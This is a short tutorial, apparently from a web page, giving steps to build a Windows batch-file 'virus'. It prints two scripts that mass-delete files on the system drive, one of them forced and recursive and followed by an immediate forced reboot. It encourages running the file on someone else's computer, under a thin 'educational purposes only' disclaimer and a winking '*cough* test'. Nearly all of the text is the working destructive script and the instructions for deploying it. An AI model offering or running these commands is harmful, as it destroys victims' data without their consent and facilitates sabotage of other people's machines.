|
This virus is for educational purposes only. It is a fun trick to try on a NON-IMPORTANT computer. It's job is to delete contents in the C: drive and it WILL WORK.
- Open up notepad and paste everything between the "=" lines below: =================================== @Echo off Del C:\ *.* |y =================================== - Now go to File > Save As..., and change the "Save as type:" to All Files. - For the file name, save it as whatever filename you want but put a ".bat" extension at the end of it. A good example would be saving it as "virus.bat" for the File name. - Now go put this file on a computer you want to *cough* test this on and run it. DO NOT RUN ON YOUR COMPUTER! The script will delete the contents of your hard drive C. - Enjoy! (Please be careful with what you do with this virus.) NOTES: Another supposedly better version of the code is below. This might work for some people if the one above doesn't work. This command prompt script was not written by a pro, so don't go complaining that it isn't as "powerful" as it could be. ============================================ @echo off del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00 ============================================
|